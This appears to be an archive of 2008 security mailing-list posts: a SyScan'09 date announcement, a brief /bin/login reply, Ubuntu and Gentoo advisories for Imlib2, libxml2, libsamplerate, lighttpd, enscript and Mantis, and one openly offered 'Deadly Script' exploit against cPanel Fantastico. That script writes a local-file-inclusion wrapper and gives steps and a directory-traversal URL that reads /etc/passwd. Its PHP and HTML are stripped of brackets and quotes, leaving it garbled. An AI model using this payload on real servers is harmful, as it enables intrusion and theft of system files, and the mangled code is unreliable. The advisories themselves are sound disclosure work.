Dates for SyScan'09
dear all There will be 4 SyScan'09 conferences next year in 4 different exciting countries in Asia. They are as follows: SyScan'09 Shanghai: 14th and 15th May 2009 SyScan'09 Hong Kong: 19th and 20th May 2009 SyScan'09 Singapore: 2nd and 3rd July July 2009 SyScan'09 Taiwan: 7th and 8th July 2009 Do keep a lookout for more information at www.syscan.org. We will be announcing the CFP very soon. -- Thank you Thomas Lim Organiser SyScan'08 www.syscan.org
Re: /bin/login gives root to group utmp
I'm glad you finally seemed to make the 'bug' fixing team of Debian aware of security issues. I'm just glad I personally haven't seem this much scrutiny from the security team or my faith in Debian maintainers in all areas would significantly drop even more. Nice find.
Cpanel fantastico Privilege Escalation ModSec and PHP restriction Bypass
Script : Cpanel 11.x
bug : language.php [edite file]
exploit=Cpanel fantastico Privilege Escalation ModSec and PHP restriction
Bypass
safemode off , mod_security off Disable functions : All NONE ,access root
folder
?php
/*
# Deadly Script by Super-Crystal
# bypass Cpanel fantastico
# www.arab4services.net
###e-mail : [EMAIL PROTECTED] , [EMAIL PROTECTED]
###
*/
set_time_limit(0);
if(isset($_POST['sup3r'])) {
if(stristr(php_uname(),2.6.) stristr(php_uname(),Linux)) {
$phpwrapper = '?php
include_once(./language/.$_GET[sup3r]..php);
?
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], w);
fwrite($handle, $phpwrapper);
fclose($handle);
echo Building exploit...br /;
echo coding by Super-Crystal br /;
echo Cleaning upbr /;
echo Done!br /
/pre;
} else {
echo error : .php_uname();
}
} else {
?
div align=center
h3Deadly Script/h3
font color=redCpanel fantastico Privilege Escalation ModSec and PHP
restriction Bypass/fontbr /
prediv align=center
/pre/divbr /
table border=0 cellspacing=0
tr
form action=?php echo $_SERVER['PHP_SELF']; ? method=post
table border=0 cellspacing=0
tr
tddiv align=rightExploit:/div/td
td
select name=exploit
option selected=selectedCpanel fantastico Privilege Escalation ModSec and
PHP restriction Bypass/option
/select
/td
/tr
tr
tddiv align=rightchange/div/td
tdinput type=text name=php size=50 value=?php echo
getcwd()./language.php ? //td
/tr
tr
/table
/div
input type=hidden name=sup3r value=doit /
input name=submit type=submit value=Submit /br /
1- change /home/[user]/.fantasticodata/language.php
br /
2- click on the submit
br /
3- now put it like this (e.g)
:
http://www..com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00
.
br /
font color=redWritten: 10.10.2008/fontbr /
font color=bluePublic: 26.11.2008/fontbr /
div align=center
font color=redAuthor : Super-Crystal/fontbr /
a href=http://www.arab4services.net;Arab4services.net /a/center
/div
/form
?php } ?
arab4services.net
[USN-683-1] Imlib2 vulnerability
=== Ubuntu Security Notice USN-683-1 December 02, 2008 imlib2 vulnerability CVE-2008-5187 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libimlib2 1.2.1-2ubuntu0.3 Ubuntu 7.10: libimlib2 1.3.0.0debian1-4ubuntu0.1 Ubuntu 8.04 LTS: libimlib2 1.4.0-1ubuntu1.1 Ubuntu 8.10: libimlib2 1.4.0-1.1ubuntu1.1 After a standard system upgrade you need to restart any applications that use Imlib2 to effect the necessary changes. Details follow: It was discovered that Imlib2 did not correctly handle certain malformed XPM images. If a user were tricked into opening a specially crafted image with an application that uses Imlib2, an attacker could cause a denial of service and possibly execute arbitrary code with the user's privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.3.diff.gz Size/MD5: 111655 1db5e38ae075ba7879e2379de336fa60 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1-2ubuntu0.3.dsc Size/MD5: 753 d207af283f3356525dd8bf1863b18dde http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.2.1.orig.tar.gz Size/MD5: 911360 deb3c9713339fe9ca964e100cce42cd1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_amd64.deb Size/MD5: 352032 ca8a615db5f3fe5f9d9e7be5bc6e5251 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_amd64.deb Size/MD5: 214630 575972ea6305a67fb7dba4a9767bd738 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_i386.deb Size/MD5: 302506 558d3ca8288047f906d0abe64cacff0a http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_i386.deb Size/MD5: 193346 8814a94983cb3dc69c8751f8ffb0c0a7 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_powerpc.deb Size/MD5: 341950 42cd29c55636cf54b595d40a1d8da334 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_powerpc.deb Size/MD5: 212852 aebcc16c8a0f26d97ff9b8853bc96344 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.2.1-2ubuntu0.3_sparc.deb Size/MD5: 318490 f96156937b2ac3fddfef13feab5c317b http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.2.1-2ubuntu0.3_sparc.deb Size/MD5: 194030 74b17b7473671d6bce17168e3a93892e Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.1.diff.gz Size/MD5:13311 8aace634a15651f892a707288bb06d80 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1-4ubuntu0.1.dsc Size/MD5: 873 b0131ffc8e50111ef870a805d74b5603 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/imlib2_1.3.0.0debian1.orig.tar.gz Size/MD5: 617750 7f389463afdb09310fa61e5036714bb3 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_amd64.deb Size/MD5: 365864 03137784605c2957899f2e3ea98c7abb http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_amd64.deb Size/MD5: 213966 04d1d6d16c95ef15d400b69f946ef465 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_i386.deb Size/MD5: 334386 8964c1cf0d89fce685e45c275fe9b398 http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_i386.deb Size/MD5: 205672 7eda0e69c39446878a3604fcfa2bd100 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_lpia.deb Size/MD5: 341396 c566cf2c1190d50307518180ecbaf1f8 http://ports.ubuntu.com/pool/main/i/imlib2/libimlib2_1.3.0.0debian1-4ubuntu0.1_lpia.deb Size/MD5: 209212 cbdccce66f76e6811562e07c69b1 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/i/imlib2/libimlib2-dev_1.3.0.0debian1-4ubuntu0.1_powerpc.deb Size/MD5: 362434
[ GLSA 200812-06 ] libxml2: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libxml2: Multiple vulnerabilities Date: December 02, 2008 Bugs: #234099, #237806, #239346, #245960 ID: 200812-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in libxml2 might lead to execution of arbitrary code or Denial of Service. Background == libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project. Affected packages = --- Package / Vulnerable / Unaffected --- 1 dev-libs/libxml2 2.7.2-r1 = 2.7.2-r1 Description === Multiple vulnerabilities were reported in libxml2: * Andreas Solberg reported that libxml2 does not properly detect recursion during entity expansion in an attribute value (CVE-2008-3281). * A heap-based buffer overflow has been reported in the xmlParseAttValueComplex() function in parser.c (CVE-2008-3529). * Christian Weiske reported that predefined entity definitions in entities are not properly handled (CVE-2008-4409). * Drew Yao of Apple Product Security reported an integer overflow in the xmlBufferResize() function that can lead to an infinite loop (CVE-2008-4225). * Drew Yao of Apple Product Security reported an integer overflow in the xmlSAX2Characters() function leading to a memory corruption (CVE-2008-4226). Impact == A remote attacker could entice a user or automated system to open a specially crafted XML document with an application using libxml2, possibly resulting in the exeution of arbitrary code or a high CPU and memory consumption. Workaround == There is no known workaround at this time. Resolution == All libxml2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-libs/libxml2-2.7.2-r1 References == [ 1 ] CVE-2008-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281 [ 2 ] CVE-2008-3529 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529 [ 3 ] CVE-2008-4409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4409 [ 4 ] CVE-2008-4225 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4225 [ 5 ] CVE-2008-4226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4226 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200812-05 ] libsamplerate: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libsamplerate: User-assisted execution of arbitrary code Date: December 02, 2008 Bugs: #237037 ID: 200812-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A buffer overflow vulnerability in libsamplerate might lead to the execution of arbitrary code. Background == Secret Rabbit Code (aka libsamplerate) is a Sample Rate Converter for audio. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-libs/libsamplerate0.1.4 = 0.1.4 Description === Russell O'Connor reported a buffer overflow in src/src_sinc.c related to low conversion ratios. Impact == A remote attacker could entice a user or automated system to process a specially crafted audio file possibly leading to the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All libsamplerate users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v =media-libs/libsamplerate-0.1.4 References == [ 1 ] CVE-2008-5008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5008 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200812-04 ] lighttpd: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: lighttpd: Multiple vulnerabilities Date: December 02, 2008 Bugs: #238180 ID: 200812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in lighttpd may lead to information disclosure or a Denial of Service. Background == lighttpd is a lightweight high-performance web server. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-servers/lighttpd 1.4.20 = 1.4.20 Description === Multiple vulnerabilities have been reported in lighttpd: * Qhy reported a memory leak in the http_request_parse() function in request.c (CVE-2008-4298). * Gaetan Bisson reported that URIs are not decoded before applying url.redirect and url.rewrite rules (CVE-2008-4359). * Anders1 reported that mod_userdir performs case-sensitive comparisons on filename components in configuration options, which is insufficient when case-insensitive filesystems are used (CVE-2008-4360). Impact == A remote attacker could exploit these vulnerabilities to cause a Denial of Service, to bypass intended access restrictions, to obtain sensitive information, or to possibly modify data. Workaround == There is no known workaround at this time. Resolution == All lighttpd users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-servers/lighttpd-1.4.20 References == [ 1 ] CVE-2008-4298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4298 [ 2 ] CVE-2008-4359 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4359 [ 3 ] CVE-2008-4360 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4360 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200812-02 ] enscript: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: enscript: User-assisted execution of arbitrary code Date: December 02, 2008 Bugs: #243228 ID: 200812-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Two buffer overflows in enscript might lead to the execution of arbitrary code. Background == enscript is a powerful ASCII to PostScript file converter. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-text/enscript 1.6.4-r4 = 1.6.4-r4 Description === Two stack-based buffer overflows in the read_special_escape() function in src/psgen.c have been reported. Ulf Harnhammar of Secunia Research discovered a vulnerability related to the setfilename command (CVE-2008-3863), and Kees Cook of Ubuntu discovered a vulnerability related to the font escape sequence (CVE-2008-4306). Impact == An attacker could entice a user or automated system to process specially crafted input with the special escapes processing enabled using the -e option, possibly resulting in the execution of arbitrary code. Workaround == There is no known workaround at this time. Resolution == All enscript users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-text/enscript-1.6.4-r4 References == [ 1 ] CVE-2008-3863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3863 [ 2 ] CVE-2008-4306 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4306 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-02.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200812-07 ] Mantis: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200812-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Mantis: Multiple vulnerabilities Date: December 02, 2008 Bugs: #238570, #241940, #242722 ID: 200812-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in Mantis, the most severe of which leading to the remote execution of arbitrary code. Background == Mantis is a PHP/MySQL/Web based bugtracking system. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 www-apps/mantisbt 1.1.4-r1 = 1.1.4-r1 Description === Multiple issues have been reported in Mantis: * EgiX reported that manage_proj_page.php does not correctly sanitize the sort parameter before passing it to create_function() in core/utility_api.php (CVE-2008-4687). * Privileges of viewers are not sufficiently checked before composing a link with issue data in the source anchor (CVE-2008-4688). * Mantis does not unset the session cookie during logout (CVE-2008-4689). * Mantis does not set the secure flag for the session cookie in an HTTPS session (CVE-2008-3102). Impact == Remote unauthenticated attackers could exploit these vulnerabilities to execute arbitrary PHP commands, disclose sensitive issue data, or hijack a user's sessions. Workaround == There is no known workaround at this time. Resolution == All Mantis users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/mantisbt-1.1.4-r1 References == [ 1 ] CVE-2008-3102 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3102 [ 2 ] CVE-2008-4687 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4687 [ 3 ] CVE-2008-4688 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4688 [ 4 ] CVE-2008-4689 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4689 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200812-07.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
